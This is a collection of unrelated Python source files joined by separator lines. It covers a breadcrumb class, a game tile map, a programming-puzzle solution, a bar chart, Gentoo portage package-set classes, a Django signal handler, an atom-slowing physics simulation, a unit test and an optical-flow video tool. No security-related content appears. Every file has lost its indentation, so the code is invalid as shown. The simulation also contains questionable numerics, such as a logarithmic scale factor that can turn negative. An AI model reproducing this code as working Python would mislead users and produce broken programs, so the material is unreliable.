def __init__(self, name, href):
self.name = name
if href == '/':
self.href = href
else:
self.href = '/' + str(href) + '/'
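# e.g. BreadCrumb('Home', '/').href == '/' while BreadCrumb('Docs', 'docs').href == '/docs/'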
|
import GameLogic.Unit
from GameLogic.Barrack import BaseBarrack
from GameLogic.Character import *
from Vector2 import Vector2
class Tile:
def __init__(self, _position: Vector2, _basicMoney: int, _enemyMoney: int):
self._position = _position
self._basicMoney = _basicMoney
self._enemyMoney = _enemyMoney
self._building = None
self._unit = None
@property
def Building(self):
return self._building
@Building.setter
def Building(self, value):
if value is not None and self._building is not None:
raise Exception("there is already a building on this Tile")
self._building = value
@property
def Unit(self) -> GameLogic.Unit.Unit:
return self._unit
@Unit.setter
def Unit(self, value: GameLogic.Unit.Unit):
self._unit = value
@property
def Position(self) -> Vector2:
return self._position
@property
def BasicMoney(self) -> int:
return self._basicMoney
@property
def EnemyMoney(self) -> int:
return self._enemyMoney
def GetMoney(self, player):
return 0
class DesertTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is DesertCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class ForestTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is ForestCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class GoldTile(Tile):
def __init__(self, _position):
super().__init__(_position, 150, 150)
def GetMoney(self, player):
return 150
class IceTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is IceCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class SeaTile(Tile):
def __init__(self, _position):
super().__init__(_position, 0, 0)
class SwampTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is SwampCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
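# Map builds an 18x18 board: ForestTile where both X and Y are small, IceTile for large X / small Y,
# DesertTile for small X / large Y, SwampTile where both are large, GoldTile in the central block
# (7 <= X,Y <= 10) and SeaTile everywhere else; the four corner tiles receive a BaseBarrack for each
# player present in the game logic.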
class Map:
def DetermineTileType(self, X, Y, logic: GameLogic):
if X < 7 and Y < 7 and X+Y < 10:
tile = ForestTile(Vector2(X, Y))
elif Y < 7 and 18 > X > 10 > (17-X) + Y:
tile = IceTile(Vector2(X, Y))
elif X < 7 and 18 > Y > 10 > X + (17 - Y):
tile = DesertTile(Vector2(X, Y))
elif 10 < X < 18 and Y > 10 > (17 - Y) + (17 - X):
tile = SwampTile(Vector2(X, Y))
elif 6 < X < 11 and 6 < Y < 11:
tile = GoldTile(Vector2(X, Y))
else:
tile = SeaTile(Vector2(X, Y))
if X % 17 == 0 and Y % 17 == 0:
# (x + y) in (0, 1, 2, 3)
x = 0 if X == 0 else 1
y = 0 if Y == 0 else 2
if logic.TotalPlayers > x + y:
player = logic.Players[x + y]
tile.Building = BaseBarrack(tile, player)
return tile
def __init__(self, logic):
self._tiles = [
[self.DetermineTileType(x, y, logic) for y in range(0, 18)]
for x in range(0, 18)
]
@property
def TilesIterator(self):
for row in self._tiles:
for tile in row:
yield tile
def GetTile(self, position: Vector2) -> Tile:
return self._tiles[position.X][position.Y]
|
"""
분해합
https://www.acmicpc.net/problem/2231
"""
n = int(input())
data = []
for i in range(n):
digit_sum = 0
for j in str(i):
digit_sum += int(j)
digit_sum += i
if digit_sum == n:
data.append(i)
if len(data) == 0:
print("0")
else:
print(min(data))
|
import matplotlib.pyplot as plt
import numpy as np
divisions = ["Div-a","Div-b","Div-c","Div-d","Div-e"]
divisions_average_marks = [70,82,73,65,68]
boys_average_marks = [68,67,77,61,70]
index = np.arange(5)
width = 0.30
plt.bar(index,divisions_average_marks,width,color='green', label = 'Division marks')
plt.bar(index+width,boys_average_marks,width,color = 'blue', label = 'boys marks')
plt.title("grouped bar graph")
plt.xlabel("divisions")
plt.ylabel("marks")
plt.xticks(index+ width/2,divisions)
plt.legend(loc = 'best')
plt.show()
|
# Copyright 2007-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import sys
from portage.dep import Atom, ExtendedAtomDict, best_match_to_list, match_from_list
from portage.exception import InvalidAtom
from portage.versions import cpv_getkey
if sys.hexversion >= 0x3000000:
basestring = str
OPERATIONS = ["merge", "unmerge"]
class PackageSet(object):
# Set this to operations that are supported by your subclass. While
# technically there is no difference between "merge" and "unmerge" regarding
# package sets, the latter doesn't make sense for some sets like "system"
# or "security" and therefore isn't supported by them.
_operations = ["merge"]
description = "generic package set"
def __init__(self, allow_wildcard=False, allow_repo=False):
self._atoms = set()
self._atommap = ExtendedAtomDict(set)
self._loaded = False
self._loading = False
self.errors = []
self._nonatoms = set()
self.world_candidate = False
self._allow_wildcard = allow_wildcard
self._allow_repo = allow_repo
def __contains__(self, atom):
self._load()
return atom in self._atoms or atom in self._nonatoms
def __iter__(self):
self._load()
for x in self._atoms:
yield x
for x in self._nonatoms:
yield x
def __bool__(self):
self._load()
return bool(self._atoms or self._nonatoms)
if sys.hexversion < 0x3000000:
__nonzero__ = __bool__
def supportsOperation(self, op):
if not op in OPERATIONS:
raise ValueError(op)
return op in self._operations
def _load(self):
if not (self._loaded or self._loading):
self._loading = True
self.load()
self._loaded = True
self._loading = False
def getAtoms(self):
self._load()
return self._atoms.copy()
def getNonAtoms(self):
self._load()
return self._nonatoms.copy()
def _setAtoms(self, atoms):
self._atoms.clear()
self._nonatoms.clear()
for a in atoms:
if not isinstance(a, Atom):
if isinstance(a, basestring):
a = a.strip()
if not a:
continue
try:
a = Atom(a, allow_wildcard=True, allow_repo=True)
except InvalidAtom:
self._nonatoms.add(a)
continue
if not self._allow_wildcard and a.extended_syntax:
raise InvalidAtom("extended atom syntax not allowed here")
if not self._allow_repo and a.repo:
raise InvalidAtom("repository specification not allowed here")
self._atoms.add(a)
self._updateAtomMap()
def load(self):
# This method must be overwritten by subclasses
# Editable sets should use the value of self._mtime to determine if they
# need to reload themselves
raise NotImplementedError()
def containsCPV(self, cpv):
self._load()
for a in self._atoms:
if match_from_list(a, [cpv]):
return True
return False
def getMetadata(self, key):
if hasattr(self, key.lower()):
return getattr(self, key.lower())
else:
return ""
def _updateAtomMap(self, atoms=None):
"""Update self._atommap for specific atoms or all atoms."""
if not atoms:
self._atommap.clear()
atoms = self._atoms
for a in atoms:
self._atommap.setdefault(a.cp, set()).add(a)
# Not sure if this one should really be in PackageSet
def findAtomForPackage(self, pkg, modified_use=None):
"""Return the best match for a given package from the arguments, or
None if there are no matches. This matches virtual arguments against
the PROVIDE metadata. This can raise an InvalidDependString exception
if an error occurs while parsing PROVIDE."""
if modified_use is not None and modified_use is not pkg.use.enabled:
pkg = pkg.copy()
pkg.metadata["USE"] = " ".join(modified_use)
# Atoms matched via PROVIDE must be temporarily transformed since
# match_from_list() only works correctly when atom.cp == pkg.cp.
rev_transform = {}
for atom in self.iterAtomsForPackage(pkg):
if atom.cp == pkg.cp:
rev_transform[atom] = atom
else:
rev_transform[Atom(atom.replace(atom.cp, pkg.cp, 1), allow_wildcard=True, allow_repo=True)] = atom
best_match = best_match_to_list(pkg, iter(rev_transform))
if best_match:
return rev_transform[best_match]
return None
def iterAtomsForPackage(self, pkg):
"""
Find all matching atoms for a given package. This matches virtual
arguments against the PROVIDE metadata. This will raise an
InvalidDependString exception if PROVIDE is invalid.
"""
cpv_slot_list = [pkg]
cp = cpv_getkey(pkg.cpv)
self._load() # make sure the atoms are loaded
atoms = self._atommap.get(cp)
if atoms:
for atom in atoms:
if match_from_list(atom, cpv_slot_list):
yield atom
provides = pkg.metadata['PROVIDE']
if not provides:
return
provides = provides.split()
for provide in provides:
try:
provided_cp = Atom(provide).cp
except InvalidAtom:
continue
atoms = self._atommap.get(provided_cp)
if atoms:
for atom in atoms:
if match_from_list(atom.replace(provided_cp, cp),
cpv_slot_list):
yield atom
class EditablePackageSet(PackageSet):
def __init__(self, allow_wildcard=False, allow_repo=False):
super(EditablePackageSet, self).__init__(allow_wildcard=allow_wildcard, allow_repo=allow_repo)
def update(self, atoms):
self._load()
modified = False
normal_atoms = []
for a in atoms:
if not isinstance(a, Atom):
try:
a = Atom(a, allow_wildcard=True, allow_repo=True)
except InvalidAtom:
modified = True
self._nonatoms.add(a)
continue
if not self._allow_wildcard and a.extended_syntax:
raise InvalidAtom("extended atom syntax not allowed here")
if not self._allow_repo and a.repo:
raise InvalidAtom("repository specification not allowed here")
normal_atoms.append(a)
if normal_atoms:
modified = True
self._atoms.update(normal_atoms)
self._updateAtomMap(atoms=normal_atoms)
if modified:
self.write()
def add(self, atom):
self.update([atom])
def replace(self, atoms):
self._setAtoms(atoms)
self.write()
def remove(self, atom):
self._load()
self._atoms.discard(atom)
self._nonatoms.discard(atom)
self._updateAtomMap()
self.write()
def removePackageAtoms(self, cp):
self._load()
for a in list(self._atoms):
if a.cp == cp:
self.remove(a)
self.write()
def write(self):
# This method must be overwritten in subclasses that should be editable
raise NotImplementedError()
class InternalPackageSet(EditablePackageSet):
def __init__(self, initial_atoms=None, allow_wildcard=False, allow_repo=True):
"""
Repo atoms are allowed more often than not, so it makes sense for this
class to allow them by default. The Atom constructor and isvalidatom()
functions default to allow_repo=False, which is sufficient to ensure
that repo atoms are prohibited when necessary.
"""
super(InternalPackageSet, self).__init__(allow_wildcard=allow_wildcard, allow_repo=allow_repo)
if initial_atoms is not None:
self.update(initial_atoms)
def clear(self):
self._atoms.clear()
self._updateAtomMap()
def load(self):
pass
def write(self):
pass
class DummyPackageSet(PackageSet):
def __init__(self, atoms=None):
super(DummyPackageSet, self).__init__()
if atoms:
self._setAtoms(atoms)
def load(self):
pass
def singleBuilder(cls, options, settings, trees):
atoms = options.get("packages", "").split()
return DummyPackageSet(atoms=atoms)
singleBuilder = classmethod(singleBuilder)
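# Minimal usage sketch (the atom strings below are hypothetical examples, not from this file):
# pkgs = InternalPackageSet(initial_atoms=[">=dev-lang/python-3.9", "sys-apps/portage"])
# pkgs.getAtoms()      # returns a copy of the parsed Atom set
# pkgs.getNonAtoms()   # strings that failed to parse as atoms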
|
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
from .models import Dprofile
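# post_save handler: whenever a new User row is created, create and save a matching Dprofile.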
@receiver(post_save,sender=User)
def create_profile(sender, instance, created, **kwargs):
user = instance
if created:
dprofile = Dprofile(user=user)
dprofile.save()
#testing
# Dprofile.objects.create(user=instance)
# instance.dprofile.save()
# @receiver(post_save, sender=User)
# def save_profile(sender, instance, **kwargs):
# instance.dprofile.save()
|
'''
% captured as fn of Col_Gap
'''
import numpy as np
import scipy.stats as sts
import matplotlib.pyplot as plt
import scipy.constants as sc
import scipy.special as scp
import timeit
start = timeit.default_timer()
ymot = 0.008 # Diameter of Col Atoms
G = 38.11e6 # See ln 96
Xi_D = 6.6
Xi_d = 0.15
E0 = 170
aa = 0.15 # Coil Radius
s = 0.11 # Coil Separation
Curr = 0.6805 # Current (16G/cm @ 0.6805)
z0 = 0.24 # Position of MOT centre
z_0 = z0-aa
Satoms = 15000
Ssteps = 140
Sh = 0.000001
h = 0.000012 #Step Size
Natoms = 500
Nsteps = 500
T = 40
r_max = 0.04
Col_zPos = 0
Col_Gap = 0.001
tcc = 0.003
'''If ^ > ymot then simulation is unphysical'''
#J = 10e20
#Q = J*(Col_Gap/2)**2
print('E0, Da, d is {}, {}, {}'.format(E0,Xi_D,Xi_d))
Da = Xi_D*G # Original detuning
d = Xi_d*G # Increment of Detuning
Db,Dc,Dd,De,Df,Dg = Da+d, Da+2*d, Da+3*d, Da+4*d, Da+5*d, Da+6*d
xx = np.linspace(0.000001, 1, 100)
def Sz_initial(Satoms):
'''Initial conditions for z position'''
z0 = np.random.rand(Satoms)
return Col_zPos*z0
def Sy_initial(Satoms):
'''Initial conditions for y position'''
r0 = np.random.rand(Satoms)-0.5
return r_max*r0*2
pm=[]
kb = sc.Boltzmann
MMM= 87*sc.proton_mass
a=abs(np.sqrt((kb*(273+T))/(MMM)))
print('scale, a', a)
#pm_=-1*np.sign(y_initial(Satoms))
def Szy_vel(Satoms,PM):
z0 = np.random.rand(Satoms)
y0 = 1-z0 # vy's share of the random number
Z = sts.maxwell.isf(z0, scale=a)
Y = sts.maxwell.isf(y0, scale=a*np.log(np.pi*abs(y0-0.5))) # *1 no 2 from the e^(sqrt(av**2))
return Z,np.multiply(PM,Y)
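# RK4step advances one step of the coupled ODE system z' = dz(t, z, v), v' = dv(t, z, v) with a
# classical fourth-order Runge-Kutta update of step size h, returning the new (z, v).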
def RK4step(ti,zi,vi,h,dv,dz):
k11=dz(ti,zi,vi)
k21=dv(ti,zi,vi)
k12=dz(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)
k22=dv(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)
k13=dz(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)
k23=dv(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)
k14=dz(ti+h,zi +(h)*k13,vi +(h)*k23)
k24=dv(ti+h,zi +(h)*k13,vi +(h)*k23)
z1=zi+(h/6.0)*(k11+2.0*k12+2.0*k13+k14)
v1=vi+(h/6.0)*(k21+2.0*k22+2.0*k23+k24)
zi = z1
vi = v1
return zi,vi
def Sdv(t,z,v):
return 0
def Sdz(t,z,v):
return v
###########################
def zgen(n):
lin = np.linspace(0,0,n)
return lin
def yrand(n):
ran = np.random.random(n)
return (ran-0.5)*Col_Gap
def MBrand(n):
x = np.random.rand(n)
X = sts.maxwell.isf(x, scale=a)
return X
pm = np.random.rand(Satoms).round(0)
PM = np.power(np.linspace(-1,-1,Satoms),pm) # This gives us a 1d array of +-1 randomly
#v_ = 0.5*(max(MBrand(Natoms))+min(MBrand(Natoms))) #Mean Velocity
sv_ = np.mean(Szy_vel(Satoms, PM)[0])
svy = ((ymot-Col_Gap/2)*sv_)/(z_0**2+(ymot-Col_Gap/2)**2)**0.5
v_ = np.mean(MBrand(Natoms))
vy = ((ymot-Col_Gap/2)*v_)/(z0**2+(ymot-Col_Gap/2)**2)**0.5
def Vyrand(n):
ran = np.random.random(n)
return (ran-0.5)*vy*2
""" Physical & Atomic Constants """
kb = sc.Boltzmann # Boltzmann Constant
mu0 = sc.mu_0 # Vacuum permeability
muB = 9.2740099*10**-24 # Bohr magneton
hbar = sc.hbar # hbar
c = sc.c # speed of light
pi = np.pi # pi
u = sc.proton_mass # Proton Mass
M = 87*u # Mass of 87Rb
wab = 2*pi*384.23e12 # Frequency of transition
#G = 38.11e6 # Gamma / Rate of SpE
dip = 3.485e-29 # dipole moment
''' Variable Dance '''
Rabi = dip*E0/hbar # Rabi Frequency
IoIs = 2*Rabi**2/G**2 # Intensity / Saturation Intensity
IrE = c*8.85e-12/2*E0**2/10000 # Intensity (This /10000 makes it W/cm^2)
w = wab - Dd # Average Freq of colliding photon
Lambda = 2*pi*c/w # Avg Wavelength
k = 2*pi/Lambda # Average wavenumber of a momentum transferring photon
'''
def MagLeak(z, z0, Curr):
#Mag Field from AntiHlmHltz coils (of center z0 [ >0 ]) that leaks into our slower
x = s/2
ZZ = -z+z0
zz = -ZZ
A,B = ZZ/aa, x/aa
Q = B**2+(1+A)**2
k = (4*A/Q)**0.5
B0 = Curr*sc.mu_0/(2*aa)
K = scp.ellipk(k**2)
E = scp.ellipe(k**2)
Br = 2*B0*(x/ZZ)/(np.pi*Q**0.5)*(E*(1+A**2+B**2)/(Q-4*A)-K)
Bro = np.nan_to_num(Br)
#
A_ = zz/aa
Q_ = B**2+(1+A_)**2
k_ = (4*A_/Q_)**0.5
K_ = scp.ellipk(k_**2)
E_ = scp.ellipe(k_**2)
Br_ = -2*B0*(x/zz)/(np.pi*Q_**0.5)*(E_*(1+A_**2+B**2)/(Q_-4*A_)-K_)
Br_o = np.nan_to_num(Br_)
return Br_o + Bro
'''
def dv(t,z,v):
" The 'complete' Force Equation for a 7 freq 1 dimensional slower inc. magnetic field "
w_a = wab - Da
w_b = wab - Db
w_c = wab - Dc
w_d = wab - Dd
w_e = wab - De
w_f = wab - Df
w_g = wab - Dg
Oa = w_a/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Ob = w_b/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Oc = w_c/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Od = w_d/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Oe = w_e/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Of = w_f/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Og = w_g/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
c1a = 1+IoIs+4*Da**2/G**2
c2a = Oa*8*Da/G**2
c1b = 1+IoIs+4*Db**2/G**2
c2b = Ob*8*Db/G**2
c1c = 1+IoIs+4*Dc**2/G**2
c2c = Oc*8*Dc/G**2
c1d = 1+IoIs+4*Dd**2/G**2
c2d = Od*8*Dd/G**2
c1e = 1+IoIs+4*De**2/G**2
c2e = Oe*8*De/G**2
c1f = 1+IoIs+4*Df**2/G**2
c2f = Of*8*Df/G**2
c1g = 1+IoIs+4*Dg**2/G**2
c2g = Og*8*Dg/G**2
c3a = 4*Oa**2/G**2
c3b = 4*Ob**2/G**2
c3c = 4*Oc**2/G**2
c3d = 4*Od**2/G**2
c3e = 4*Oe**2/G**2
c3f = 4*Of**2/G**2
c3g = 4*Og**2/G**2
rhoaa = -(IoIs/2)*(1/(c1a-c2a*v+c3a*v**2)+1/(c1b-c2b*v+c3b*v**2)+1/(c1c-c2c*v+c3c*v**2)+1/(c1d-c2d*v+c3d*v**2)+1/(c1e-c2e*v+c3e*v**2)+1/(c1f-c2f*v+c3f*v**2)+1/(c1g-c2g*v+c3g*v**2))
return rhoaa*hbar*k*G/M
def dz(t,z,v):
return v
""" S O U R C E L O O P """
sY = Sy_initial(Satoms)
sZ = Sz_initial(Satoms)
#print(PM)
sVz, sVy = Szy_vel(Satoms,PM)
zs,vs,ts=[],[],[]
ys,yvs=[],[]
for j in range(Satoms):
vi = sVz[j]
zi = sZ[j]
yvi= sVy[j]
yi = sY[j]
for i in range(Ssteps):
ti=Sh*i
zs.append(zi)
vs.append(vi)
ts.append(ti)
ys.append(yi)
yvs.append(yvi)
z1,v1=RK4step(ti,zi,vi,Sh,Sdv,Sdz)
y1,yv1=RK4step(ti,yi,yvi,Sh,Sdv,Sdz)
yvi,yi,zi,vi = yv1,y1,z1,v1
Y_data = np.reshape(ys, (Satoms,Ssteps))
Vy_data = np.reshape(yvs, (Satoms,Ssteps))
Z_data = np.reshape(zs, (Satoms,Ssteps))
col = []
th = []
n = []
m = []
for j in range(Satoms):
col.append('red')
th.append(0.1)
n.append(0)
m.append(0)
for i in range(Ssteps):
nnn=False
if ( Col_zPos+tcc > Z_data[j][i] > Col_zPos and abs(Y_data[j][i]) < Col_Gap/2 ):
col[j] = 'green'
th[j] = 2.0
n[j] = 1
if ( abs(Vy_data[j][i]) < svy and Col_zPos+tcc > Z_data[j][i] > Col_zPos and abs(Y_data[j][i]) < Col_Gap/2 ):
col[j] = 'cyan'
th[j] = 4.0
m[j] = 1
else:
pass
Nn = np.sum(n)
Mm = np.sum(m)
#leString = " nAtoms = {}\nnSteps/Size={}/{}\n Escaped = {} %\n <vy' = {}%\n Runtime = {}s".format(Satoms, Ssteps,h,round(Nn*100/Satoms,2), round(Mm*100/Satoms,3), round(stop - start, 3))
#BIGString = " Pin Hole Diameter = {}mm \n Ratio of Simulated / Escaped = {}%".format(Col_Gap*1000, round(Mm*100/Nn),3)
print('sRed={}, sGreen={}, sCyan = {}'.format(Satoms-Nn-Mm,Nn,Mm))
# ATOM COUNTER - i know what I need to do here
J = 10e20
Q = J*(Col_Gap/2)**2
q = Q*(Mm/Satoms)
print('q , Q =',q,Q)
plt.close('all')
fig = plt.figure()
ax1 = plt.subplot2grid((2,1), (0,0))#, rowspan=2)
ax2 = plt.subplot2grid((2,1), (1,0), sharex=ax1)
""" P L O T & C A P T U R E L O O P """
zlin=zgen(Natoms)
yran = yrand(Natoms)
Vyran = Vyrand(Natoms)
vran = MBrand(Natoms)
zsC,vsC,tsC=[],[],[]
ysC,yvsC=[],[]
"""this loop goes through all the atoms we've got and applies the force dv to them for a number of steps, Nsteps"""
for j in range(Natoms):
viC = vran[j]
ziC = zlin[j]
yviC= Vyran[j]
yiC = yran[j]
for i in range(Nsteps):
tiC=h*i
zsC.append(ziC)
vsC.append(viC)
tsC.append(tiC)
ysC.append(yiC)
yvsC.append(yviC)
z1C=RK4step(tiC,ziC,viC,h,dv,dz)[0]
v1C=RK4step(tiC,ziC,viC,h,dv,dz)[1]
y1C=RK4step(tiC,yiC,yviC,h,Sdv,Sdz)[0]
yv1C=RK4step(tiC,yiC,yviC,h,Sdv,Sdz)[1]
yviC = yv1C
yiC = y1C
ziC = z1C
viC = v1C
Y = np.reshape(ysC, (Natoms,Nsteps))
V = np.reshape(vsC, (Natoms,Nsteps))
Z = np.reshape(zsC, (Natoms,Nsteps))
tt = np.array(tsC)
thet = np.split(tt, Natoms)[1]
Top, Thicc = 0.002, 0.003
ax1.bar(Col_zPos, Top, Thicc, bottom= Col_Gap/2, color='k')
ax1.bar(Col_zPos,-Top, Thicc, bottom=-Col_Gap/2, color='k')
#print(Y, Y.shape)
''' Collimation Collision Detection '''
'''nn=0
for j in range(Natoms):
for i in range(Nsteps):
if (Z[j][i] < Col_zPos and abs(Y[j][i]) > Col_Gap/2):
Y[j],Z[j] = np.linspace(0,0,Nsteps), np.linspace(0,-0.01,Nsteps)
nn += 1
'''
''' Capture Detection '''
z_ , z__ = z0 - ymot, z0 + ymot
y_ = 0.01
capV, capv = 50,15
n_ = []
for j in range(Natoms):
for i in range(Nsteps):
if (z_ < Z[j][i] < z__ and abs(Y[j][i]) < ymot and abs(V[j][i]) < capV):
#Y[j],Z[j] = np.linspace(0,0,Nsteps), np.linspace(0,0.0001,Nsteps)
nnn = 2
n_ = np.append(n_, nnn)
else:
nnn = 0
n_ = np.append(n_, nnn)
N = np.reshape(n_, (Natoms, Nsteps))
#print(n_)
#rint(N)
N0 = 0
for j in range(Natoms):
NN = False
for i in range(Nsteps):
if N[j][i] == 2:
NN = True
if NN == True:
N0 += 1
print(N0)
for i in range(Natoms):
'A plot for each of the Natoms particles'
th = 0.5
col = (0.1, float(i/(Natoms+1)+0.0001), 1-float(i/(Natoms+5)+0.0001))
ax1.plot(Z[i],Y[i],linewidth=th, color = col)
ax2.plot(Z[i],V[i],linewidth=th, color = col)
ax1.axhspan(-ymot/2,ymot/2, alpha=0.05, color='green')
ax1.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')
ax1.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax1.axvline(x = z0, color = 'k', linestyle='dashed')
ax1.axvline(x = z0-0.01, color = 'r')
ax1.axvline(x = z0+0.01, color = 'r')
ax1.axhline(y = ymot/2, color = 'r')
ax1.axhline(y = -ymot/2, color = 'r')
ax1.set_ylim(top = 2*ymot, bottom = -2*ymot)
ax2.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')
ax2.axhspan(-capV,capV, alpha=0.05, color='b')
ax2.axhspan(-capv,capv, alpha=0.05, color='red')
ax2.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax2.axvline(x = z0, color = 'k', linestyle='dashed')
ax2.axvline(x = z0-0.01, color = 'r')
ax2.axvline(x = z0+0.01, color = 'r')
ax2.axhline(y = capv, color = 'r')
ax2.axhline(y = -capv, color = 'r')
ax2.set_xlim(left=-0.009, right=z0+1*aa)
ax2.set_ylim(top=350, bottom=-20)
fig.subplots_adjust(hspace=0) # Makes the plots that share the
# # same x axis on top of each other
ax1.set_ylabel("y coordinate / m", size = 17)
ax2.set_ylabel("Velocity / ms`'", size = 17)
#ax3.set_title('Multi-Frequency Slowing Simulation: $\it{7}$ $\it{Frequencies}$, $\it{MOT}$ $\it{Magnetic}$ $\it{Field}$', size=17)
ax1.set_title('7-Frequency: Total Loading Fraction', size=20)
ax2.set_xlabel('Distance / m', size = 18)
#ax1.set_yticks(np.arange(-0.002, 0.002, step=0.0005))
q_pc = q*N0/Natoms
#Q_pc = q_pc/(1-np.cos(np.arctan(vy/v_)))
print('Total Flux % =', q_pc/Q * 100)
'''Slope Finding'''
'''
LenLin,dd = 1000, 0.03
LinGrad = np.linspace(z0-dd, z0+dd, LenLin)
Bp = MagLeak(LinGrad,z0,Curr)[0]
Bm = MagLeak(LinGrad,z0,Curr)[LenLin-1]
ax4.plot(LinGrad, MagLeak(LinGrad, z0, Curr)*1000, color='cyan', lw=0.5)
Grad = abs(Bp-Bm)/(2*dd)
'''
from datetime import date
today = date.today()
d4 = today.strftime("%d-%b-%Y")
stop = timeit.default_timer()
#print("d4 =", d4)
#ax3.legend(title=' {}\nIntensity = {}W/cm2\nDetuning = {} w/ Increment {}MHz\nE0 = {} no. atoms = {} \nLength of Tube = {}cm\nMag Field Gradient = {}G/cm'.format(d4,round(IrE, 3),Da/1000000,d/1000000,E0,nj, round((z0-aa)*100,3),round(Grad*1000000,2), loc=2, prop={'size': 18}))
stop = timeit.default_timer()
Ustr = 'Pinhole Diameter = {}mm\n Captured / Released = {}%\n Loading Rate = N/A'.format(Col_Gap*1000,round(N0*Mm/(Ssteps*Nn)*100,4))
ustr = 'E0 = {} D = {} d = {}\n\n#Rb = {}\nEscaped = {}\nReasonable = {}\n\n#Simmed = {}\nCaptured = {}\n\nTube = {}cm\n Mag Field Grad = N/A G/m\n\nRuntime = {}\n {}'.format(E0,Xi_D,Xi_d, Satoms,Nn,Mm, Natoms,N0, z_0*100, round(stop - start, 3),d4)
ax2.text(z0+0.04,20,ustr, fontsize=19, bbox = dict(boxstyle='round', fc=(0.79,0.98,0.6), alpha=0.4))
ax1.text(z0+0.03,-1.6*ymot,Ustr,fontweight='bold',fontsize=23, bbox = dict(boxstyle='round', fc=(0.99,0.87,0.12), alpha=0.5))
print('Velocity Range = [{},{}]'.format(round(min(vran),1),round(max(vran),1)))
print('# Particles = {}'.format(Natoms))
print('Beam Intensity = {}W/cm^2'.format(round(IrE, 3)))
print('Run Time =',round(stop - start, 3),'sec')
print('vy = {}m/s'.format(vy))
#print('Flux ')
plt.show()
|
import unittest
from katas.kyu_7.find_the_capitals import capitals
class CapitalsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(capitals('CoDeWaRs'), [0, 2, 4, 6])
|
import cv2
import numpy as np
from src.image.utils import rgb2gray
from src.video.video_reader import AviReader
from src.image.utils import uv_2_motion_vector
from src.image.utils import draw_motion_vectors
from src.image.horn_schunk import HornSchunkFrame
class HS_Estimate:
def __init__(self,alpha,num_iter,video_path=None):
if video_path is None:
raise Exception("Please enter path for video")
self.video_path = video_path
self.alpha = alpha
self.num_iter = num_iter
self.reader = None
self.num_frames = None
self.hs_estimator = None
self.motion_vectors = []
self.matched_frames = []
self.vector_added_frames = []
self.vector_field_frames = []
self.loss = []
self.reset_state(video_path,alpha=alpha,num_iter=num_iter)
def _init_frames(self,path=None):
if path is None:
path = self.video_path
self.reader = AviReader(path, mode="np")
self.num_frames = len(self.reader)
def _init_hs_estimator(self,alpha=None,num_iter=None):
if alpha is None:
alpha = self.alpha
if num_iter is None:
num_iter = self.num_iter
self.hs_estimator = HornSchunkFrame(alpha=alpha, num_iter=num_iter)
def reset_state(self,path=None,alpha=None,num_iter=None):
self._init_frames(path=path)
self._init_hs_estimator(alpha=alpha,num_iter=num_iter)
def match_with_original(self):
for frame in range(self.num_frames-1):
print("Working on frame:{}".format(frame + 1))
anchor_frame = self.reader[frame]
next_frame = self.reader[frame+1]
anchor_frame = rgb2gray(anchor_frame)
next_frame = rgb2gray(next_frame)
u, v = self.hs_estimator(anchor_frame, next_frame)
            # NOTE: the original called an undefined block_swap/matched_pairs helper;
            # as an assumed fix, warp the anchor frame with the estimated flow (u, v).
            grid_x, grid_y = np.meshgrid(np.arange(anchor_frame.shape[1]), np.arange(anchor_frame.shape[0]))
            matched_img = cv2.remap(anchor_frame.astype(np.float32), (grid_x + u).astype(np.float32),
                                    (grid_y + v).astype(np.float32), cv2.INTER_LINEAR)
            vector_image = np.copy(matched_img)
vectors = uv_2_motion_vector(u=u,v=v)
vector_image = draw_motion_vectors(image=vector_image, u=u,v=v, color=(255, 255, 255), thickness=1)
self.motion_vectors.append(vectors)
self.matched_frames.append(matched_img)
self.vector_added_frames.append(vector_image)
            # mean squared error between the compensated frame and the true next frame
            # (the original referenced an undefined image_mse helper)
            self.loss.append(float(np.mean((matched_img.astype(np.float64) - next_frame.astype(np.float64)) ** 2)))
def save_results(self,save_path):
save_path = "../"+save_path+"/"
len_results = len(self.matched_frames)
size = (self.matched_frames[0].shape[1],self.matched_frames[0].shape[0])
fourcc = cv2.VideoWriter_fourcc(*'XVID')
video_writer = cv2.VideoWriter(save_path+"output_video.avi",fourcc,20.0,size,0)
for res in range(len_results):
frame = self.matched_frames[res]
frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
video_writer.write(frame)
cv2.imwrite(save_path + "matched_frame_" + str(res) + ".jpg", self.matched_frames[res])
cv2.imwrite(save_path+"vector_frame_"+str(res)+".jpg",self.vector_added_frames[res])
video_writer.release()
with open(save_path+"loss.txt", "w") as file:
file.write(str(self.loss)+"\n")
file.close()
with open(save_path+"vectors.txt", "w") as file:
for im_idx,im_vectors in enumerate(self.motion_vectors):
for vec_idx,vector in enumerate(im_vectors):
print("Writing Frame:{} Vector:{}".format(im_idx,vec_idx))
file.write("Frame No:{} Vector No:{} Start:{} End:{}".format(im_idx,vec_idx,vector.start,vector.end))
file.write("\n")
file.close()
